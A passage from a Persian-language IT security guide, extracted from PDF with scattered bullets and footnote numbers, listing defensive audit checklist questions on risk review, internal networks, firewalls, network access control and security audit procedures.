ﺍﻗﺪﺍﻣﺎﺕ ﺗﺪﺍﻓﻌﻲ ﺍﻭﻟﻴﻪ ﺭﺍ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﻛﻨﺪ.
ﺁﻳﺎ ﻫﻤﺔ ﺍﻓـﺮﺍﺩ ﺑـﻪ ﻳـﻚ ﻧـﺴﺨﻪ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎ ﺩﺳﺘﺮﺳـﻲ
ﺩﺍﺭﻧﺪ؟
•
ﺁﻳﺎ ﻛﺴﻲ ﺷﺨﺼﹰﺎ ﺩﺭ ﺯﻣﻴﻨﺔ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎ ﻣـﺴﺌﻮﻟﻴﺖ
ﺻﺮﻳﺢ ﺩﺍﺭﺩ؟
•
ﺁﻳﺎ ﻛﺴﻲ ﻛﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺳﻴﺎﺳـﺘﻬﺎ ﺑـﺮ ﻋﻬـﺪﺓ ﺍﻭﺳـﺖ ﺩﺭ
ﻛﻨﻔﺮﺍﻧﺴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺷﺮﻛﺖ ﻣـﻲﻛﻨـﺪ ﻭ ﺩﺍﻧـﺶ ﺍﻣﻨﻴﺘـﻲ
ﺧﻮﺩ ﺭﺍ ﺑﻪﺭﻭﺯ ﻧﮕﻪ ﻣﻲﺩﺍﺭﺩ؟
•
ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺯﻳﺮ ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮﻱ ﺭﺍ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺍﺭﺯﻳـﺎﺑﻲ
ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺯﻳﺎﻥ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ.
ﺁﻳﺎ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ ﺑﻪ ﺑﺎﺯﺑﻴﻨﻲ ﻣﻲﭘﺮﺩﺍﺯﻳـﺪ ﺗـﺎ ﻣﻄﻤـﺌﻦ
ﺷﻮﻳﺪ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻫﻤﭽﻨﺎﻥ ﭘﺎﺑﺮﺟﺎ ﻫﺴﺘﻨﺪ؟
•
ﺁﻳﺎ ﻣﻄﻤﺌﻦ ﻫﺴﺘﻴﺪ ﺗﻤﺎﻡ ﺍﺷﺨﺎﺻﻲ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷـﻤﺎ
ﺭﺍ ﻧﺼﺐ ﻣﻲﻛﻨﻨـﺪ ﻃﺒـﻖ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﻭ ﺭﻭﺍﻟﻬـﺎ ﺍﻣﻨﻴﺘـﻲ
ﺷﺮﻛﺖ ﺷﻤﺎ ﺁﻣﻮﺯﺵ ﺩﻳﺪﻩﺍﻧﺪ؟
•
ﺁﻳــﺎ ﭘــﻴﺶ ﺍﺯ ﺑﻜــﺎﺭﮔﻴﺮﻱ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﻧــﺮﻡﺍﻓــﺰﺍﺭﻱ ﻭ
ﻲ
ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ،ﺍﺯ ﺭﻓﻊ ﻭ ﺭﺟﻮﻉ ﺗﻤـﺎﻡ ﻣـﺸﻜﻼﺕ ﺍﻣﻨﻴﺘـ ﹺ
ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻣﻲﻛﻨﻴﺪ؟
•
ﺁﻳﺎ ﮔﺰﺍﺭﺷﻬﺎﻱ ﺑﺎﺯﺑﻴﻨﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗـﺮﺍﺭ ﻣـﻲﺩﻫﻴـﺪ؟
ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ؟
ﭼﺎﺭﭼﻮﺏ ﻛﻨﺘﺮﻝ ﻭ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ
ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺑﺎﺯﻧﮕﺮﻱ ﻣﺨﺎﻃﺮﺍﺕ
١٨٩
•
ﺁﻳﺎ ﺍﺧﻴﺮﹰﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﺍﺕ ﺻﻮﺭﺕ ﮔﺮﻓﺘـﻪ ﺍﺳـﺖ؟ ﺍﻳـﻦ
ﺍﺭﺯﻳﺎﺑﻲ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ ﺑﻪﺭﻭﺯ ﻣﻲﺷﻮﺩ؟
•
ﺁﻳﺎ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺮ ﺣﺴﺐ ﺣﺴﺎﺳﻴﺖ ﻣﺨﺎﻃﺮﺍﺕ )ﻏﻴﺮﺣـﺴﺎﺱ،
ﺣﺴﺎﺱ ،ﻭ ﺑﺴﻴﺎﺭ ﺣﺴﺎﺱ( ﺗﻘﺴﻴﻢﺑﻨﺪﻱ ﺷﺪﻩﺍﻧﺪ؟
•
ﺁﻳﺎ ﺍﻫﺪﺍﻑ ﻣﺪﻳﺮﻳﺘﻲ ﺑﺮ ﺍﺳﺎﺱ ﺍﺻﻮﻝ ﺍﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ؟
•
ﺁﻳﺎ ﺑﺮﺍﻱ ﺁﺯﻣﻮﺩﻥ ﻧﺘﺎﻳﺞ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨـﺎﻃﺮﺍﺕ ،ﺑﺎﺯﺑﻴﻨﻴﻬـﺎﻱ
ﻣﻨﻈﻢ ﺍﻧﺠﺎﻡ ﻣﻲﮔﻴﺮﺩ؟
•
ﺁﻳﺎ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺍﺭﺯﻳﺎﺑﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﻭ
ﻛــﺎﻫﺶ ﺩﺍﺩﻩ ﺷــﻮﻧﺪ ،ﺍﺯ ﻣﻤﻴﺰﻫــﺎﻱ ﺧــﺎﺭﺝ ﺍﺯ ﺳــﺎﺯﻣﺎﻥ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ؟
•
ﺁﻳﺎ ﺗﻤﺎﻡ ﻛﺎﺭﻣﻨـﺪﺍﻥ )ﺣﺘـﻲ ﻣـﺪﻳﺮﺍﻥ ﻭ ﺭﺍﻫﺒـﺮﺍﻥ ﺳﻴـﺴﺘﻢ( ﺑـﺮ
ﺍﺳﺎﺱ ﺍﻫﺪﺍﻑ ﺍﻣﻨﻴﺘـﻲ ﻣـﻮﺭﺩ ﺍﺭﺯﺷـﻴﺎﺑﻲ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪ ﻭ
ﻣﻨﺼﻮﺏ ﺷﺪﻩﺍﻧﺪ؟
۱۸۹ﻫﻤﺎﻥ ﻣﻨﺒﻊ ،ﻓﺼﻞ ﺷﺸﻢ ،ﺍﻣﻨﻴﺖ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻧﺸﺪﻩ ،ﺹ ۹۵
ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ :ﺷﺒﻜﻪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟﻲ
ﻣﺒﺤــﺚ ﺍﻣﻨﻴــﺖ ﻓﻴﺰﻳﻜــﻲ ﺩﺭ ﺳــﻄﻮﺡ ﻣﺨﺘﻠﻔــﻲ ﺍﺯ ﺟﺰﺋﻴــﺎﺕ ﺩﺭ
ﺑﺨﺸﻬﺎﻱ ﺩﻭﻡ )ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﻧﻔـﺮﺍﺩﻱ( ،ﺳـﻮﻡ
)ﻫﻤﻴﻦ ﺑﺨﺶ( ﻭ ﭘﻨﺠﻢ )ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺭﺍﻫﺒـﺮﺍﻥ ﻭ ﻓﻨـﻲ(
ﭘﻮﺷﺶ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ .ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﻓﻨﻲ ،ﺑﻌﻀﻲ ﺯﻣﻴﻨﻪﻫﺎ ﺑﺎﻳـﺪ ﺍﺯ
ﻣﻨﻈﺮ ﺍﻣﻨﻴﺘﻲ ﺗﺤﺖ ﭘﻮﺷﺶ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ؛ ﻣﺜﻞ ﺷﺒﻜﻪﻫﺎﻱ ﺩﺍﺧﻠﻲ،
ﺷﺒﻜﻪﻫﺎﻱ ﺧﺎﺭﺟﻲ ،ﻭ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪﻫﺎ .ﻓﻬﺮﺳﺘﻬﺎﻱ
ﻛﻨﺘﺮﻝ ﺯﻳﺮ ﺟﻬﺖ ﻛﻤﻚ ﺑﻪ ﺣﻔﻆ ﻣﻨﺎﺑﻊ ﻓﻴﺰﻳﻜـﻲ ﻳـﻚ ﻣﺤـﻴﻂ
ﺷﺒﻜﻪﺍﻱ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ.
۱۹۰ﻫﻤﺎﻥ ﻣﻨﺒﻊ ،ﻓﺼﻞ ﺩﻭﻡ ،ﺍﻣﻨﻴﺖ ﻣﺒﺘﻜﺮﺍﻧﻪ ،ﺹ ۳۲
٢٠١
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻓﻬﺮﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ
١٩١
•
ﺁﻳﺎ ﻛﺴﻲ ﻣﺴﺌﻮﻟﻴﺖ ﺍﻧﺠﺎﻡ ﺁﺯﻣﻮﻥ ﻧﻔـﻮﺫ ١٩٣ﺭﻭﻱ ﺩﻳـﻮﺍﺭﺓ
ﺁﺗﺶ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺭﺩ؟
ﺁﻳﺎ ﻣﺸﺨﺺ ﺍﺳﺖ ﻛﻪ ﻣـﺴﺌﻮﻟﻴﺖ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺩﻳـﻮﺍﺭﺓ
ﺁﺗﺶ )ﺩﺭﺻﻮﺭﺕ ﻟﺰﻭﻡ( ﺑﺮ ﻋﻬﺪﺓ ﻛﻴﺴﺖ؟
•
•
ﺁﻳﺎ ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎ ﺷﺎﻣﻞ ﻣﺠﻮﺯﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ
ﻓﺎﻳﻠﻬﺎ ،ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ،ﻭ ﻭﺻﻠﻪﻫﺎ ﻣﻲﺷﻮﻧﺪ؟
•
•
ﺁﻳﺎ ﺧﺪﻣﺎﺕ ﻏﻴﺮﺿﺮﻭﺭﻱ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩﻩﺍﻳﺪ؟
ﺁﻳﺎ ﺑﺮﺍﻱ ﺍﻣﻮﺭ ﺭﺍﻫﺒﺮﻱ ،ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ،ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﺩﻳـﻮﺍﺭﺓ
ﺁﺗﺶ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﻨﺎﺳﺐ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺍﺳﺖ؟
•
ﺁﻳﺎ ﺳﻴﺎﺳﺘﻲ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟
•
•
ﺁﻳﺎ ﻣﺪﻳﺮﺍﻥ ﺑـﻪ ﻧﻘـﺶ ﺧـﻮﺩ ﺩﺭ ﻓﺮﺁﻳﻨـﺪ ﺍﻣﻨﻴـﺖ ﻭ ﻧﻘـﺶ
ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﮔﺰﺍﺭﺵ ﻣﻲﺩﻫﻨﺪ ﻭﺍﻗﻔﻨﺪ؟
ﺁﻳﺎ ﻫﻤﺔ ﻛﺎﺭﺑﺮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺍﺭﻧﺪ؟
•
•
ﺁﻳﺎ ﺣﺴﺎﺑﻬﺎﻱ ﭘﻴﺶﻓﺮﺽ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻢ ﻣﻮﺟﻮﺩ ﻫـﺴﺘﻨﺪ
ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ؟
ﺁﻳﺎ ﻧﻘﺸﻬﺎ ﻭ ﻣـﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻓـﻮﺭﻳﺘﻲ ﺑﻮﺿـﻮﺡ ﻭ ﺑـﺼﻮﺭﺕ
ﺭﺳﻤﻲ ﺗﻌﺮﻳﻒ ﺷﺪﻩﺍﻧﺪ؟
•
•
ﺁﻳﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﭘﻴﺶﻓـﺮﺽ ""Guest
ﻃﺒﻖ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﻣﻤﻨﻮﻉ ﺷﺪﻩ ﺍﺳﺖ؟
ﺁﻳﺎ ﻛﺎﺭﻛﻨـﺎﻥ ﺑﺨـﺶ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺭﻭﺍﻟﻬـﺎﻱ ﭘﻴـﺸﮕﻴﺮﺍﻧﺔ
ﻣﻌﻴﻨﻲ ﭘﻴﺮﻭﻱ ﻣﻲﻛﻨﻨﺪ؟
•
•
ﺁﻳﺎ ﺣﺴﺎﺑﻬﺎﻳﻲ ﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻧﻤﻲﮔﻴﺮﻧﺪ ﺑـﺼﻮﺭﺕ
ﻣﻨﻈﻢ ﻏﻴﺮﻓﻌﺎﻝ ﻣﻲﺷﻮﻧﺪ؟
ﺁﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻬـﺎﺟﻢﻳـﺎﺏ ﺭﻭﻱ ﺳﻴـﺴﺘﻤﻬﺎ ﻭ ﺷـﺒﻜﻪ
ﻧﺼﺐ ﺷﺪﻩﺍﻧﺪ؟
•
•
ﺁﻳﺎ ﺑﻌﻨﻮﺍﻥ ﺑﺨﺸﻲ ﺍﺯ ﻓﺮﺁﻳﻨﺪ ﻧﺼﺐ ﺳﻴﺴﺘﻤﻬﺎ ،ﻭﺻﻠﻪ ﻫﺎﻱ
ﺍﻣﻨﻴﺘﻲ ﺟﺪﻳﺪ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﻧﺪ؟
ﺁﻳـــﺎ ﻧـــﺮﻡﺍﻓـــﺰﺍﺭ ﻣﻤﻴـــﺰﻱ ﺭﻭﻱ ﺗﻤــﺎﻡ ﺳﻴـــﺴﺘﻤﻬﺎﻱ
ﺑﺴﻴﺎﺭ ﺣﺴﺎﺱ ﻧﺼﺐ ﺷﺪﻩ ﺍﺳﺖ؟
•
•
ﺁﻳﺎ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺁﻧﻬـﺎ ﺑـﺎ ﺷﻤﺎﺳـﺖ
ﺑﺮﺍﻱ ﺷﻜﺴﺘﻦ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭﻱ ﻛـﻪ ﺑـﻪ ﺳـﺎﺩﮔﻲ ﻗﺎﺑـﻞ
ﺣﺪﺱ ﻫﺴﺘﻨﺪ ﺗﻼﺵ ﻣﻲﻛﻨﻴﺪ؟ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ؟
ﺁﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺿﺪﻭﻳﺮﻭﺱ ﺩﺭ ﺗﻤﺎﻡ ﻧﻘﺎﻁ ﻭﺭﻭﺩ ﺷﺒﻜﻪ ﻧﺼﺐ
ﺷﺪﻩ ﺍﺳﺖ؟
•
•
ﺁﻳﺎ ﺑﺮﺍﻱ ﺑﻬﺒﻮﺩ ﻓﺮﺁﻳﻨـﺪﻫﺎ ،ﺗﺠﺮﺑﻴـﺎﺕ ﻧﻔـﻮﺫ ﺑـﻪﺍﺷـﺘﺮﺍﻙ
ﮔﺬﺍﺷﺘﻪ ﻣﻲﺷﻮﻧﺪ؟
ﺁﻳﺎ ﻣﺮﺍﻗﺐ ﺗﻐﻴﻴﺮﺍﺕ ﻏﻴﺮﻣﺠﺎﺯ ﺩﺭ ﻓﺎﻳﻠﻬﺎ ﻫﺴﺘﻴﺪ؟ ﻫﺮ ﭼﻨـﺪ
ﻭﻗﺖ ﻳﻜﺒﺎﺭ؟
•
ﺁﻳﺎ ﻫﻨﮕﺎﻡ ﻧـﺴﺨﻪﺑـﺮﺩﺍﺭﻱ ﺍﺯ ﻓﺎﻳﻠﻬـﺎ ﺟﻮﺍﻧـﺐ ﺍﺣﺘﻴـﺎﻁ ﺭﺍ
ﺭﻋﺎﻳﺖ ﻣﻲﻛﻨﻴﺪ؟
ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪ
•
ﺁﻳﺎ ﻣﺪﻳﺮﻳﺖ ﺩﺭ ﻓﺮﺁﻳﻨـﺪ ﺗﺄﻳﻴـﺪ ﺍﺗـﺼﺎﻝ ﺑـﻪ ﺷـﺒﻜﻪﻫـﺎﻱ
ﺧﺎﺭﺟﻲ ﺩﺧﻴﻞ ﺍﺳﺖ؟
ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺷﺒﻜﻪﻫﺎﻱ ﺧـﺎﺭﺟﻲ ﻭ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ
١٩٢
ﺁﺗﺶ
•
ﺁﻳﺎ ﻛﺴﻲ ﺍﺗﺼﺎﻻﺕ ﺑﻪ ﺧﺎﺭﺝ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﺩﻧﺒﺎﻝ ﻣﻲﻛﻨﺪ؟
•
•
ﺁﻳﺎ ﻧﻘﺸﻬﺎ ﻭ ﻣـﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﺭﻭﺷـﻨﻲ ﺗﻌﺮﻳـﻒ
ﺷﺪﻩﺍﻧﺪ؟
ﺁﻳﺎ ﻣﺪﻳﺮﺍﻥ ﺍﺯ ﺗﻌﺪﺍﺩ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻧﻲ ﻛﻪ ﻣﺘـﺼﻞ
ﺑﻪ ﺧﺎﺭﺝ ﺳﺎﺯﻣﺎﻥ ﻫﺴﺘﻨﺪ ﻣﻄﻠﻌﻨﺪ؟
•
ﺁﻳﺎ ﺧﺪﻣﺎﺕ ﻏﻴﺮﺿﺮﻭﺭﻱ ﺷﺒﻜﻪ ﻏﻴﺮﻓﻌﺎﻝ ﺷﺪﻩﺍﻧﺪ؟
•
ﺁﻳﺎ ﻓـﺮﺩﻱ ﺑـﺼﻮﺭﺕ ﻣـﻨﻈﻢ ﺗﻨﻈﻴﻤـﺎﺕ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺭﺍ
ﺑﺎﺯﺑﻴﻨﻲ ﻣﻲﻛﻨﺪ؟ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ؟
•
ﺁﻳﺎ ﭘﻴﺶ ﺍﺯ ﺗﺄﻳﻴﺪ ﺍﺗﺼﺎﻻﺕ ﺧﺎﺭﺟﻲ ،ﻧﻴﺎﺯ ﻭﺍﻗﻌﻲ ﺑـﻪ ﺁﻧﻬـﺎ
ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؟
۱۹۱ﻫﻤﺎﻥ ﻣﻨﺒﻊ ،ﻓﺼﻞ ﻫﺸﺘﻢ ،ﺍﻣﻨﻴﺖ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ،ﺹ ۱۲۱
۱۹۲ﻫﻤﺎﻥ ﻣﻨﺒﻊ ،ﻓﺼﻞ ﻫﻔﺘﻢ ،ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ،ﺹ ۱۰۹
193 Penetration Testing
ﺑﺨﺶ ﺳﻮﻡ
•
ﺁﻳﺎ ﺑﺮﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﻴﺴﺘﻤﻬﺎ ،ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻣﻌﻴﻦ
ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟
٢٠٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
•
ﺁﻳﺎ ﺷﺮﻛﺖ ﺑـﺮﺍﻱ ﻛﻨﺘـﺮﻝ ﺍﺗـﺼﺎﻻﺕ ﺧـﺎﺭﺟﻲ ﺑـﺼﻮﺭﺕ
ﻣﻨﻈﻢ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎﺯﺑﻴﻨﻲ ﻣﻲﻛﻨﺪ؟
ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺭﻭﺍﻟﻬﺎﻱ ﺑﺎﺯﺑﻴﻨﻲ
١٩٤
•
ﺁﻳﺎ ﻳﻚ ﺳﻴﺎﺳﺖ ﺭﺳﻤﻲ ﺑﺮﺍﻱ ﺑﺎﺯﺑﻴﻨﻲ ﺩﺍﺭﻳﺪ؟
•
ﺁﻳﺎ ﺑﺮﺍﻱ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩﻥ ﺍﺗـﺼﺎﻝ ﺍﻓـﺮﺍﺩ ﻳـﺎ ﭘﻴﻤﺎﻧﻜـﺎﺭﺍﻥ
ﻣﺴﺘﻌﻔﻲ ،ﺭﻭﺍﻝ ﺧﺎﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟
•
ﺁﻳﺎ ﺑﺮﺍﻱ ﺁﺯﻣﻮﻥ ﺍﻣﻨﻴﺖ ،ﺭﻭﺍﻟﻬـﺎﻱ ﻛﺘﺒـﻲ ﺑـﺎﺯﺑﻴﻨﻲ ﺗﻬﻴـﻪ
ﻛﺮﺩﻩﺍﻳﺪ؟
•
ﺁﻳــﺎ ﺑــﺮﺍﻱ ﻧــﺼﺐ ﺩﻳــﻮﺍﺭﺓ ﺁﺗــﺶ ،ﺳﻴﺎﺳــﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻱ
ﻣﺨﺼﻮﺹ ﻣﻮﺟﻮﺩ ﺍﺳﺖ؟
•
ﺁﻳﺎ ﺑﺎﺯﺑﻴﻨﻲﻫﺎ ﻃﺒﻖ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻣﻨﻈﻢ ﺯﻣـﺎﻧﻲ ﺑـﻪ ﺍﻧﺠـﺎﻡ
ﻣﻲﺭﺳﻨﺪ؟
•
ﺁﻳﺎ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺗﺼﺎﻻﺕ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﻪ ﺷـﺒﻜﻪﻫـﺎﻱ
ﺧﺎﺭﺟﻲ ﺳﻴﺎﺳﺖ ﻭ ﺭﻭﺍﻝ ﺧﺎﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟
•
ﺁﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺎﺯﺑﻴﻨﻲ ﺭﻭﻱ ﻫﻤﺔ ﺍﻧـﻮﺍﻉ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎﻱ
ﺷﻤﺎ ) (Unix/Linux, Mac, Windowsﻧﺼﺐ ﺷﺪﻩﺍﻧﺪ؟
•
ﺁﻳــﺎ ﻫﻤــﺔ ﺳﻴﺎﺳــﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻱ ﻣﺮﺑــﻮﻁ ﺑــﻪ ﺍﺗــﺼﺎﻻﺕ
ﺑﺼﻮﺭﺕ ﺍﺟﺒﺎﺭﻱ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﻧﺪ؟
•
ﺁﻳﺎ ﺑﺮﺍﻱ ﺧﺮﻳـﺪ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﺑـﺎﺯﺑﻴﻨﻲ ،ﺑﻮﺩﺟـﺔ
ﻣﻨﺎﺳﺐ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ؟
•
ﺁﻳﺎ ﻣﺪﻳﺮﺍﻥ ﺑﺎ ﻓـﺮﺍﻫﻢ ﻛـﺮﺩﻥ ﺍﻣﻜـﺎﻥ ﺁﻣـﻮﺯﺵ ﺻـﺤﻴﺢ
ﻣﻤﻴﺰﺍﻥ ،ﺍﺯ ﻓﺮﺁﻳﻨـﺪ ﺑـﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴـﺖ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣﻨﺎﺳـﺐ
ﺑﻌﻤﻞ ﻣﻲﺁﻭﺭﻧﺪ؟
ﺑﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴﺖ
ﺩﺭ ﻋﻴﻦ ﺍﻳﻨﻜﻪ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﻘـﺎﺩﻳﺮ ﻫﻨﮕﻔﺘـﻲ ﺯﻣـﺎﻥ ﻭ ﭘـﻮﻝ ﺭﺍ
ﺟﻬﺖ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ،ﺁﻣﻮﺯﺵ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﻭ
ﺗﻮﺟــﻪ ﺑــﻪ ﻣــﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﺷﻨﺎﺳــﺎﻥ ﺍﻣﻨﻴﺘــﻲ ﺻــﺮﻑ ﻣــﻲﻛﻨــﺪ،
ﺍﺛﺮﺑﺨﺸﻲ ﺍﻳﻦ ﺗﻼﺷﻬﺎ ﻧﻴﺰ ﻟﺤﻈﻪ ﺑﻪ ﻟﺤﻈﻪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ ﺍﺭﺯﻳـﺎﺑﻲ
ﻗﺮﺍﺭ ﮔﻴﺮﺩ .ﺑﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴﺘﻲ ،ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻧﻘﺎﻁ ﺿﻌﻒ ﺑﺮﻧﺎﻣﺔ ﺟـﺎﻣﻊ
ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻛﻪ ﺑﺎ ﺭﺷﺪ ﻭ ﺗﻐﻴﻴﺮ ﺩﺭ ﻃﻮﻝ ﻋﻤﺮ ﺳﺎﺯﻣﺎﻥ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ
ﻭ ﻳﺎ ﺑﻪ ﻫﺮ ﺗﺮﺗﻴﺐ ﻧﻤﻲﺗﻮﺍﻧﺴﺘﻪ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﺭﺍ ﺁﺷـﻜﺎﺭ
ﻣﻲﻛﻨﺪ .ﺑﺎﺯﺑﻴﻨﻲﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻳﻚ ﻣﺰﻳﺖ ﺩﻳﮕـﺮ ﻧﻴـﺰ ﺑـﻪ ﻫﻤـﺮﺍﻩ
